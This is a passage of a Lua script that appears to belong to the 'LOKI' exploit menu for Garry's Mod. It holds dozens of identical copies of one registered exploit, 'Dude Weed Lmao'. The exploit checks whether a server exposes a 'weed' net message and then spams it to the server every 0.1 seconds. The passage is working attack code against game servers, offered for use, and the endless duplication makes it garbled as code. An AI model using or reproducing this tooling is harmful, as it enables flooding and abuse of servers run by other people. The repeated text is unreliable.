  4670. net.WriteString( "DUDE" )
  4671. net.SendToServer()
  4672. end)
  4673. else
  4674. timer.Remove( "loki_bonghit" )
  4675. end
  4676. end, },
  4677. },
  4678. } )
  4679.  
  4680. LOKI.AddExploit( "Dude Weed Lmao", {
  4681. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4682. severity = 1,
  4683. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4684. functions = {
  4685. { typ = "func", name = "Big Weed", func = function()
  4686. if !timer.Exists( "loki_bonghit" ) then
  4687. timer.Create( "loki_bonghit", 0.1, 0, function()
  4688. net.Start( "weed" )
  4689. net.WriteString( "DUDE" )
  4690. net.SendToServer()
  4691. end)
  4692. else
  4693. timer.Remove( "loki_bonghit" )
  4694. end
  4695. end, },
  4696. },
  4697. } )
  4698.  
  4699. LOKI.AddExploit( "Dude Weed Lmao", {
  4700. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4701. severity = 1,
  4702. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4703. functions = {
  4704. { typ = "func", name = "Big Weed", func = function()
  4705. if !timer.Exists( "loki_bonghit" ) then
  4706. timer.Create( "loki_bonghit", 0.1, 0, function()
  4707. net.Start( "weed" )
  4708. net.WriteString( "DUDE" )
  4709. net.SendToServer()
  4710. end)
  4711. else
  4712. timer.Remove( "loki_bonghit" )
  4713. end
  4714. end, },
  4715. },
  4716. } )
  4717.  
  4718. LOKI.AddExploit( "Dude Weed Lmao", {
  4719. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4720. severity = 1,
  4721. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4722. functions = {
  4723. { typ = "func", name = "Big Weed", func = function()
  4724. if !timer.Exists( "loki_bonghit" ) then
  4725. timer.Create( "loki_bonghit", 0.1, 0, function()
  4726. net.Start( "weed" )
  4727. net.WriteString( "DUDE" )
  4728. net.SendToServer()
  4729. end)
  4730. else
  4731. timer.Remove( "loki_bonghit" )
  4732. end
  4733. end, },
  4734. },
  4735. } )
  4736.  
  4737. LOKI.AddExploit( "Dude Weed Lmao", {
  4738. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4739. severity = 1,
  4740. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4741. functions = {
  4742. { typ = "func", name = "Big Weed", func = function()
  4743. if !timer.Exists( "loki_bonghit" ) then
  4744. timer.Create( "loki_bonghit", 0.1, 0, function()
  4745. net.Start( "weed" )
  4746. net.WriteString( "DUDE" )
  4747. net.SendToServer()
  4748. end)
  4749. else
  4750. timer.Remove( "loki_bonghit" )
  4751. end
  4752. end, },
  4753. },
  4754. } )
  4755.  
  4756. LOKI.AddExploit( "Dude Weed Lmao", {
  4757. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4758. severity = 1,
  4759. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4760. functions = {
  4761. { typ = "func", name = "Big Weed", func = function()
  4762. if !timer.Exists( "loki_bonghit" ) then
  4763. timer.Create( "loki_bonghit", 0.1, 0, function()
  4764. net.Start( "weed" )
  4765. net.WriteString( "DUDE" )
  4766. net.SendToServer()
  4767. end)
  4768. else
  4769. timer.Remove( "loki_bonghit" )
  4770. end
  4771. end, },
  4772. },
  4773. } )
  4774.  
  4775. LOKI.AddExploit( "Dude Weed Lmao", {
  4776. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4777. severity = 1,
  4778. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4779. functions = {
  4780. { typ = "func", name = "Big Weed", func = function()
  4781. if !timer.Exists( "loki_bonghit" ) then
  4782. timer.Create( "loki_bonghit", 0.1, 0, function()
  4783. net.Start( "weed" )
  4784. net.WriteString( "DUDE" )
  4785. net.SendToServer()
  4786. end)
  4787. else
  4788. timer.Remove( "loki_bonghit" )
  4789. end
  4790. end, },
  4791. },
  4792. } )
  4793.  
  4794. LOKI.AddExploit( "Dude Weed Lmao", {
  4795. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4796. severity = 1,
  4797. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4798. functions = {
  4799. { typ = "func", name = "Big Weed", func = function()
  4800. if !timer.Exists( "loki_bonghit" ) then
  4801. timer.Create( "loki_bonghit", 0.1, 0, function()
  4802. net.Start( "weed" )
  4803. net.WriteString( "DUDE" )
  4804. net.SendToServer()
  4805. end)
  4806. else
  4807. timer.Remove( "loki_bonghit" )
  4808. end
  4809. end, },
  4810. },
  4811. } )
  4812.  
  4813. LOKI.AddExploit( "Dude Weed Lmao", {
  4814. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4815. severity = 1,
  4816. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4817. functions = {
  4818. { typ = "func", name = "Big Weed", func = function()
  4819. if !timer.Exists( "loki_bonghit" ) then
  4820. timer.Create( "loki_bonghit", 0.1, 0, function()
  4821. net.Start( "weed" )
  4822. net.WriteString( "DUDE" )
  4823. net.SendToServer()
  4824. end)
  4825. else
  4826. timer.Remove( "loki_bonghit" )
  4827. end
  4828. end, },
  4829. },
  4830. } )
  4831.  
  4832. LOKI.AddExploit( "Dude Weed Lmao", {
  4833. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4834. severity = 1,
  4835. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4836. functions = {
  4837. { typ = "func", name = "Big Weed", func = function()
  4838. if !timer.Exists( "loki_bonghit" ) then
  4839. timer.Create( "loki_bonghit", 0.1, 0, function()
  4840. net.Start( "weed" )
  4841. net.WriteString( "DUDE" )
  4842. net.SendToServer()
  4843. end)
  4844. else
  4845. timer.Remove( "loki_bonghit" )
  4846. end
  4847. end, },
  4848. },
  4849. } )
  4850.  
  4851. LOKI.AddExploit( "Dude Weed Lmao", {
  4852. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4853. severity = 1,
  4854. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4855. functions = {
  4856. { typ = "func", name = "Big Weed", func = function()
  4857. if !timer.Exists( "loki_bonghit" ) then
  4858. timer.Create( "loki_bonghit", 0.1, 0, function()
  4859. net.Start( "weed" )
  4860. net.WriteString( "DUDE" )
  4861. net.SendToServer()
  4862. end)
  4863. else
  4864. timer.Remove( "loki_bonghit" )
  4865. end
  4866. end, },
  4867. },
  4868. } )
  4869.  
  4870. LOKI.AddExploit( "Dude Weed Lmao", {
  4871. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4872. severity = 1,
  4873. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4874. functions = {
  4875. { typ = "func", name = "Big Weed", func = function()
  4876. if !timer.Exists( "loki_bonghit" ) then
  4877. timer.Create( "loki_bonghit", 0.1, 0, function()
  4878. net.Start( "weed" )
  4879. net.WriteString( "DUDE" )
  4880. net.SendToServer()
  4881. end)
  4882. else
  4883. timer.Remove( "loki_bonghit" )
  4884. end
  4885. end, },
  4886. },
  4887. } )
  4888.  
  4889. LOKI.AddExploit( "Dude Weed Lmao", {
  4890. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4891. severity = 1,
  4892. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4893. functions = {
  4894. { typ = "func", name = "Big Weed", func = function()
  4895. if !timer.Exists( "loki_bonghit" ) then
  4896. timer.Create( "loki_bonghit", 0.1, 0, function()
  4897. net.Start( "weed" )
  4898. net.WriteString( "DUDE" )
  4899. net.SendToServer()
  4900. end)
  4901. else
  4902. timer.Remove( "loki_bonghit" )
  4903. end
  4904. end, },
  4905. },
  4906. } )
  4907.  
  4908. LOKI.AddExploit( "Dude Weed Lmao", {
  4909. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4910. severity = 1,
  4911. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4912. functions = {
  4913. { typ = "func", name = "Big Weed", func = function()
  4914. if !timer.Exists( "loki_bonghit" ) then
  4915. timer.Create( "loki_bonghit", 0.1, 0, function()
  4916. net.Start( "weed" )
  4917. net.WriteString( "DUDE" )
  4918. net.SendToServer()
  4919. end)
  4920. else
  4921. timer.Remove( "loki_bonghit" )
  4922. end
  4923. end, },
  4924. },
  4925. } )
  4926.  
  4927. LOKI.AddExploit( "Dude Weed Lmao", {
  4928. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4929. severity = 1,
  4930. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4931. functions = {
  4932. { typ = "func", name = "Big Weed", func = function()
  4933. if !timer.Exists( "loki_bonghit" ) then
  4934. timer.Create( "loki_bonghit", 0.1, 0, function()
  4935. net.Start( "weed" )
  4936. net.WriteString( "DUDE" )
  4937. net.SendToServer()
  4938. end)
  4939. else
  4940. timer.Remove( "loki_bonghit" )
  4941. end
  4942. end, },
  4943. },
  4944. } )
  4945.  
  4946. LOKI.AddExploit( "Dude Weed Lmao", {
  4947. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4948. severity = 1,
  4949. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4950. functions = {
  4951. { typ = "func", name = "Big Weed", func = function()
  4952. if !timer.Exists( "loki_bonghit" ) then
  4953. timer.Create( "loki_bonghit", 0.1, 0, function()
  4954. net.Start( "weed" )
  4955. net.WriteString( "DUDE" )
  4956. net.SendToServer()
  4957. end)
  4958. else
  4959. timer.Remove( "loki_bonghit" )
  4960. end
  4961. end, },
  4962. },
  4963. } )
  4964.  
  4965. LOKI.AddExploit( "Dude Weed Lmao", {
  4966. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4967. severity = 1,
  4968. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4969. functions = {
  4970. { typ = "func", name = "Big Weed", func = function()
  4971. if !timer.Exists( "loki_bonghit" ) then
  4972. timer.Create( "loki_bonghit", 0.1, 0, function()
  4973. net.Start( "weed" )
  4974. net.WriteString( "DUDE" )
  4975. net.SendToServer()
  4976. end)
  4977. else
  4978. timer.Remove( "loki_bonghit" )
  4979. end
  4980. end, },
  4981. },
  4982. } )
  4983.  
  4984. LOKI.AddExploit( "Dude Weed Lmao", {
  4985. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4986. severity = 1,
  4987. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4988. functions = {
  4989. { typ = "func", name = "Big Weed", func = function()
  4990. if !timer.Exists( "loki_bonghit" ) then
  4991. timer.Create( "loki_bonghit", 0.1, 0, function()
  4992. net.Start( "weed" )
  4993. net.WriteString( "DUDE" )
  4994. net.SendToServer()
  4995. end)
  4996. else
  4997. timer.Remove( "loki_bonghit" )
  4998. end
  4999. end, },
  5000. },
  5001. } )
  5002.  
  5003. LOKI.AddExploit( "Dude Weed Lmao", {
  5004. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5005. severity = 1,
  5006. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5007. functions = {
  5008. { typ = "func", name = "Big Weed", func = function()
  5009. if !timer.Exists( "loki_bonghit" ) then
  5010. timer.Create( "loki_bonghit", 0.1, 0, function()
  5011. net.Start( "weed" )
  5012. net.WriteString( "DUDE" )
  5013. net.SendToServer()
  5014. end)
  5015. else
  5016. timer.Remove( "loki_bonghit" )
  5017. end
  5018. end, },
  5019. },
  5020. } )
  5021.  
  5022. LOKI.AddExploit( "Dude Weed Lmao", {
  5023. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5024. severity = 1,
  5025. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5026. functions = {
  5027. { typ = "func", name = "Big Weed", func = function()
  5028. if !timer.Exists( "loki_bonghit" ) then
  5029. timer.Create( "loki_bonghit", 0.1, 0, function()
  5030. net.Start( "weed" )
  5031. net.WriteString( "DUDE" )
  5032. net.SendToServer()
  5033. end)
  5034. else
  5035. timer.Remove( "loki_bonghit" )
  5036. end
  5037. end, },
  5038. },
  5039. } )
  5040.  
  5041. LOKI.AddExploit( "Dude Weed Lmao", {
  5042. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5043. severity = 1,
  5044. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5045. functions = {
  5046. { typ = "func", name = "Big Weed", func = function()
  5047. if !timer.Exists( "loki_bonghit" ) then
  5048. timer.Create( "loki_bonghit", 0.1, 0, function()
  5049. net.Start( "weed" )
  5050. net.WriteString( "DUDE" )
  5051. net.SendToServer()
  5052. end)
  5053. else
  5054. timer.Remove( "loki_bonghit" )
  5055. end
  5056. end, },
  5057. },
  5058. } )
  5059.  
  5060. LOKI.AddExploit( "Dude Weed Lmao", {
  5061. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5062. severity = 1,
  5063. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5064. functions = {
  5065. { typ = "func", name = "Big Weed", func = function()
  5066. if !timer.Exists( "loki_bonghit" ) then
  5067. timer.Create( "loki_bonghit", 0.1, 0, function()
  5068. net.Start( "weed" )
  5069. net.WriteString( "DUDE" )
  5070. net.SendToServer()
  5071. end)
  5072. else
  5073. timer.Remove( "loki_bonghit" )
  5074. end
  5075. end, },
  5076. },
  5077. } )
  5078.  
  5079. LOKI.AddExploit( "Dude Weed Lmao", {
  5080. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5081. severity = 1,
  5082. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5083. functions = {
  5084. { typ = "func", name = "Big Weed", func = function()
  5085. if !timer.Exists( "loki_bonghit" ) then
  5086. timer.Create( "loki_bonghit", 0.1, 0, function()
  5087. net.Start( "weed" )
  5088. net.WriteString( "DUDE" )
  5089. net.SendToServer()
  5090. end)
  5091. else
  5092. timer.Remove( "loki_bonghit" )
  5093. end
  5094. end, },
  5095. },
  5096. } )
  5097.  
  5098. LOKI.AddExploit( "Dude Weed Lmao", {
  5099. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5100. severity = 1,
  5101. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5102. functions = {
  5103. { typ = "func", name = "Big Weed", func = function()
  5104. if !timer.Exists( "loki_bonghit" ) then
  5105. timer.Create( "loki_bonghit", 0.1, 0, function()
  5106. net.Start( "weed" )
  5107. net.WriteString( "DUDE" )
  5108. net.SendToServer()
  5109. end)
  5110. else
  5111. timer.Remove( "loki_bonghit" )
  5112. end
  5113. end, },
  5114. },
  5115. } )
  5116.  
  5117. LOKI.AddExploit( "Dude Weed Lmao", {
  5118. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5119. severity = 1,
  5120. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5121. functions = {
  5122. { typ = "func", name = "Big Weed", func = function()
  5123. if !timer.Exists( "loki_bonghit" ) then
  5124. timer.Create( "loki_bonghit", 0.1, 0, function()
  5125. net.Start( "weed" )
  5126. net.WriteString( "DUDE" )
  5127. net.SendToServer()
  5128. end)
  5129. else
  5130. timer.Remove( "loki_bonghit" )
  5131. end
  5132. end, },
  5133. },
  5134. } )
  5135.  
  5136. LOKI.AddExploit( "Dude Weed Lmao", {
  5137. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5138. severity = 1,
  5139. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5140. functions = {
  5141. { typ = "func", name = "Big Weed", func = function()
  5142. if !timer.Exists( "loki_bonghit" ) then
  5143. timer.Create( "loki_bonghit", 0.1, 0, function()
  5144. net.Start( "weed" )
  5145. net.WriteString( "DUDE" )
  5146. net.SendToServer()
  5147. end)
  5148. else
  5149. timer.Remove( "loki_bonghit" )
  5150. end
  5151. end, },
  5152. },
  5153. } )
  5154.  
  5155. LOKI.AddExploit( "Dude Weed Lmao", {
  5156. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5157. severity = 1,
  5158. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5159. functions = {
  5160. { typ = "func", name = "Big Weed", func = function()
  5161. if !timer.Exists( "loki_bonghit" ) then
  5162. timer.Create( "loki_bonghit", 0.1, 0, function()
  5163. net.Start( "weed" )
  5164. net.WriteString( "DUDE" )
  5165. net.SendToServer()
  5166. end)
  5167. else
  5168. timer.Remove( "loki_bonghit" )
  5169. end
  5170. end, },
  5171. },
  5172. } )
  5173.  
  5174. LOKI.AddExploit( "Dude Weed Lmao", {
  5175. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5176. severity = 1,
  5177. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5178. functions = {
  5179. { typ = "func", name = "Big Weed", func = function()
  5180. if !timer.Exists( "loki_bonghit" ) then
  5181. timer.Create( "loki_bonghit", 0.1, 0, function()
  5182. net.Start( "weed" )
  5183. net.WriteString( "DUDE" )
  5184. net.SendToServer()
  5185. end)
  5186. else
  5187. timer.Remove( "loki_bonghit" )
  5188. end
  5189. end, },
  5190. },
  5191. } )
  5192.  
  5193. LOKI.AddExploit( "Dude Weed Lmao", {
  5194. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5195. severity = 1,
  5196. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5197. functions = {
  5198. { typ = "func", name = "Big Weed", func = function()
  5199. if !timer.Exists( "loki_bonghit" ) then
  5200. timer.Create( "loki_bonghit", 0.1, 0, function()
  5201. net.Start( "weed" )
  5202. net.WriteString( "DUDE" )
  5203. net.SendToServer()
  5204. end)
  5205. else
  5206. timer.Remove( "loki_bonghit" )
  5207. end
  5208. end, },
  5209. },
  5210. } )
  5211.  
  5212. LOKI.AddExploit( "Dude Weed Lmao", {
  5213. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5214. severity = 1,
  5215. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5216. functions = {
  5217. { typ = "func", name = "Big Weed", func = function()
  5218. if !timer.Exists( "loki_bonghit" ) then
  5219. timer.Create( "loki_bonghit", 0.1, 0, function()
  5220. net.Start( "weed" )
  5221. net.WriteString( "DUDE" )
  5222. net.SendToServer()
  5223. end)
  5224. else
  5225. timer.Remove( "loki_bonghit" )
  5226. end
  5227. end, },
  5228. },
  5229. } )
  5230.  
  5231. LOKI.AddExploit( "Dude Weed Lmao", {
  5232. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5233. severity = 1,
  5234. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5235. functions = {
  5236. { typ = "func", name = "Big Weed", func = function()
  5237. if !timer.Exists( "loki_bonghit" ) then
  5238. timer.Create( "loki_bonghit", 0.1, 0, function()
  5239. net.Start( "weed" )
  5240. net.WriteString( "DUDE" )
  5241. net.SendToServer()
  5242. end)
  5243. else
  5244. timer.Remove( "loki_bonghit" )
  5245. end
  5246. end, },
  5247. },
  5248. } )
  5249.  
  5250. LOKI.AddExploit( "Dude Weed Lmao", {
  5251. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5252. severity = 1,
  5253. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5254. functions = {
  5255. { typ = "func", name = "Big Weed", func = function()
  5256. if !timer.Exists( "loki_bonghit" ) then
  5257. timer.Create( "loki_bonghit", 0.1, 0, function()
  5258. net.Start( "weed" )
  5259. net.WriteString( "DUDE" )
  5260. net.SendToServer()
  5261. end)
  5262. else
  5263. timer.Remove( "loki_bonghit" )
  5264. end
  5265. end, },
  5266. },
  5267. } )
  5268.  
  5269. LOKI.AddExploit( "Dude Weed Lmao", {
  5270. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5271. severity = 1,
  5272. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5273. functions = {
  5274. { typ = "func", name = "Big Weed", func = function()
  5275. if !timer.Exists( "loki_bonghit" ) then
  5276. timer.Create( "loki_bonghit", 0.1, 0, function()
  5277. net.Start( "weed" )
  5278. net.WriteString( "DUDE" )
  5279. net.SendToServer()
  5280. end)
  5281. else
  5282. timer.Remove( "loki_bonghit" )
  5283. end
  5284. end, },
  5285. },
  5286. } )
  5287.  
  5288. LOKI.AddExploit( "Dude Weed Lmao", {
  5289. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5290. severity = 1,
  5291. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5292. functions = {
  5293. { typ = "func", name = "Big Weed", func = function()
  5294. if !timer.Exists( "loki_bonghit" ) then
  5295. timer.Create( "loki_bonghit", 0.1, 0, function()
  5296. net.Start( "weed" )
  5297. net.WriteString( "DUDE" )
  5298. net.SendToServer()
  5299. end)
  5300. else
  5301. timer.Remove( "loki_bonghit" )
  5302. end
  5303. end, },
  5304. },
  5305. } )
  5306.  
  5307. LOKI.AddExploit( "Dude Weed Lmao", {
  5308. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5309. severity = 1,
  5310. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5311. functions = {
  5312. { typ = "func", name = "Big Weed", func = function()
  5313. if !timer.Exists( "loki_bonghit" ) then
  5314. timer.Create( "loki_bonghit", 0.1, 0, function()
  5315. net.Start( "weed" )
  5316. net.WriteString( "DUDE" )
  5317. net.SendToServer()
  5318. end)
  5319. else
  5320. timer.Remove( "loki_bonghit" )
  5321. end
  5322. end, },
  5323. },
  5324. } )
  5325.  
  5326. LOKI.AddExploit( "Dude Weed Lmao", {
  5327. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5328. severity = 1,
  5329. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5330. functions = {
  5331. { typ = "func", name = "Big Weed", func = function()
  5332. if !timer.Exists( "loki_bonghit" ) then
  5333. timer.Create( "loki_bonghit", 0.1, 0, function()
  5334. net.Start( "weed" )
  5335. net.WriteString( "DUDE" )
  5336. net.SendToServer()
  5337. end)
  5338. else
  5339. timer.Remove( "loki_bonghit" )
  5340. end
  5341. end, },
  5342. },
  5343. } )
  5344.  
  5345. LOKI.AddExploit( "Dude Weed Lmao", {
  5346. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5347. severity = 1,
  5348. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5349. functions = {
  5350. { typ = "func", name = "Big Weed", func = function()
  5351. if !timer.Exists( "loki_bonghit" ) then
  5352. timer.Create( "loki_bonghit", 0.1, 0, function()
  5353. net.Start( "weed" )
  5354. net.WriteString( "DUDE" )
  5355. net.SendToServer()
  5356. end)
  5357. else
  5358. timer.Remove( "loki_bonghit" )
  5359. end
  5360. end, },
  5361. },
  5362. } )
  5363.  
  5364. LOKI.AddExploit( "Dude Weed Lmao", {
  5365. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5366. severity = 1,
  5367. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5368. functions = {
  5369. { typ = "func", name = "Big Weed", func = function()
  5370. if !timer.Exists( "loki_bonghit" ) then
  5371. timer.Create( "loki_bonghit", 0.1, 0, function()
  5372. net.Start( "weed" )
  5373. net.WriteString( "DUDE" )
  5374. net.SendToServer()
  5375. end)
  5376. else
  5377. timer.Remove( "loki_bonghit" )
  5378. end
  5379. end, },
  5380. },
  5381. } )
  5382.  
  5383. LOKI.AddExploit( "Dude Weed Lmao", {
  5384. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5385. severity = 1,
  5386. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5387. functions = {
  5388. { typ = "func", name = "Big Weed", func = function()
  5389. if !timer.Exists( "loki_bonghit" ) then
  5390. timer.Create( "loki_bonghit", 0.1, 0, function()
  5391. net.Start( "weed" )
  5392. net.WriteString( "DUDE" )
  5393. net.SendToServer()
  5394. end)
  5395. else
  5396. timer.Remove( "loki_bonghit" )
  5397. end
  5398. end, },
  5399. },
  5400. } )
  5401.  
  5402. LOKI.AddExploit( "Dude Weed Lmao", {
  5403. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5404. severity = 1,
  5405. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5406. functions = {
  5407. { typ = "func", name = "Big Weed", func = function()
  5408. if !timer.Exists( "loki_bonghit" ) then
  5409. timer.Create( "loki_bonghit", 0.1, 0, function()
  5410. net.Start( "weed" )
  5411. net.WriteString( "DUDE" )
  5412. net.SendToServer()
  5413. end)
  5414. else
  5415. timer.Remove( "loki_bonghit" )
  5416. end
  5417. end, },
  5418. },
  5419. } )
  5420.  
  5421. LOKI.AddExploit( "Dude Weed Lmao", {
  5422. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5423. severity = 1,
  5424. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5425. functions = {
  5426. { typ = "func", name = "Big Weed", func = function()
  5427. if !timer.Exists( "loki_bonghit" ) then
  5428. timer.Create( "loki_bonghit", 0.1, 0, function()
  5429. net.Start( "weed" )
  5430. net.WriteString( "DUDE" )
  5431. net.SendToServer()
  5432. end)
  5433. else
  5434. timer.Remove( "loki_bonghit" )
  5435. end
  5436. end, },
  5437. },
  5438. } )
  5439.  
  5440. LOKI.AddExploit( "Dude Weed Lmao", {
  5441. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5442. severity = 1,
  5443. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5444. functions = {
  5445. { typ = "func", name = "Big Weed", func = function()
  5446. if !timer.Exists( "loki_bonghit" ) then
  5447. timer.Create( "loki_bonghit", 0.1, 0, function()
  5448. net.Start( "weed" )
  5449. net.WriteString( "DUDE" )
  5450. net.SendToServer()
  5451. end)
  5452. else
  5453. timer.Remove( "loki_bonghit" )
  5454. end
  5455. end, },
  5456. },
  5457. } )
  5458.  
  5459. LOKI.AddExploit( "Dude Weed Lmao", {
  5460. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5461. severity = 1,
  5462. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5463. functions = {
  5464. { typ = "func", name = "Big Weed", func = function()
  5465. if !timer.Exists( "loki_bonghit" ) then
  5466. timer.Create( "loki_bonghit", 0.1, 0, function()
  5467. net.Start( "weed" )
  5468. net.WriteString( "DUDE" )
  5469. net.SendToServer()
  5470. end)
  5471. else
  5472. timer.Remove( "loki_bonghit" )
  5473. end
  5474. end, },
  5475. },
  5476. } )
  5477.  
  5478. LOKI.AddExploit( "Dude Weed Lmao", {
  5479. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5480. severity = 1,
  5481. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5482. functions = {
  5483. { typ = "func", name = "Big Weed", func = function()
  5484. if !timer.Exists( "loki_bonghit" ) then
  5485. timer.Create( "loki_bonghit", 0.1, 0, function()
  5486. net.Start( "weed" )
  5487. net.WriteString( "DUDE" )
  5488. net.SendToServer()
  5489. end)
  5490. else
  5491. timer.Remove( "loki_bonghit" )
  5492. end
  5493. end, },
  5494. },
  5495. } )
  5496.  
  5497. LOKI.AddExploit( "Dude Weed Lmao", {
  5498. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5499. severity = 1,
  5500. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5501. functions = {
  5502. { typ = "func", name = "Big Weed", func = function()
  5503. if !timer.Exists( "loki_bonghit" ) then
  5504. timer.Create( "loki_bonghit", 0.1, 0, function()
  5505. net.Start( "weed" )
  5506. net.WriteString( "DUDE" )
  5507. net.SendToServer()
  5508. end)
  5509. else
  5510. timer.Remove( "loki_bonghit" )
  5511. end
  5512. end, },
  5513. },
  5514. } )
  5515.  
  5516. LOKI.AddExploit( "Dude Weed Lmao", {
  5517. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5518. severity = 1,
  5519. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5520. functions = {
  5521. { typ = "func", name = "Big Weed", func = function()
  5522. if !timer.Exists( "loki_bonghit" ) then
  5523. timer.Create( "loki_bonghit", 0.1, 0, function()
  5524. net.Start( "weed" )
  5525. net.WriteString( "DUDE" )
  5526. net.SendToServer()
  5527. end)
  5528. else
  5529. timer.Remove( "loki_bonghit" )
  5530. end
  5531. end, },
  5532. },
  5533. } )
  5534.  
  5535. LOKI.AddExploit( "Dude Weed Lmao", {
  5536. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5537. severity = 1,
  5538. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5539. functions = {
  5540. { typ = "func", name = "Big Weed", func = function()
  5541. if !timer.Exists( "loki_bonghit" ) then
  5542. timer.Create( "loki_bonghit", 0.1, 0, function()
  5543. net.Start( "weed" )
  5544. net.WriteString( "DUDE" )
  5545. net.SendToServer()
  5546. end)
  5547. else
  5548. timer.Remove( "loki_bonghit" )
  5549. end
  5550. end, },
  5551. },
  5552. } )
  5553.  
  5554. LOKI.AddExploit( "Dude Weed Lmao", {
  5555. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5556. severity = 1,
  5557. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5558. functions = {
  5559. { typ = "func", name = "Big Weed", func = function()
  5560. if !timer.Exists( "loki_bonghit" ) then
  5561. timer.Create( "loki_bonghit", 0.1, 0, function()
  5562. net.Start( "weed" )
  5563. net.WriteString( "DUDE" )
  5564. net.SendToServer()
  5565. end)
  5566. else
  5567. timer.Remove( "loki_bonghit" )
  5568. end
  5569. end, },
  5570. },
  5571. } )
  5572.  
  5573. LOKI.AddExploit( "Dude Weed Lmao", {
  5574. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5575. severity = 1,
  5576. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5577. functions = {
  5578. { typ = "func", name = "Big Weed", func = function()
  5579. if !timer.Exists( "loki_bonghit" ) then
  5580. timer.Create( "loki_bonghit", 0.1, 0, function()
  5581. net.Start( "weed" )
  5582. net.WriteString( "DUDE" )
  5583. net.SendToServer()
  5584. end)
  5585. else
  5586. timer.Remove( "loki_bonghit" )
  5587. end
  5588. end, },
  5589. },
  5590. } )
  5591.  
  5592. LOKI.AddExploit( "Dude Weed Lmao", {
  5593. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5594. severity = 1,
  5595. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5596. functions = {
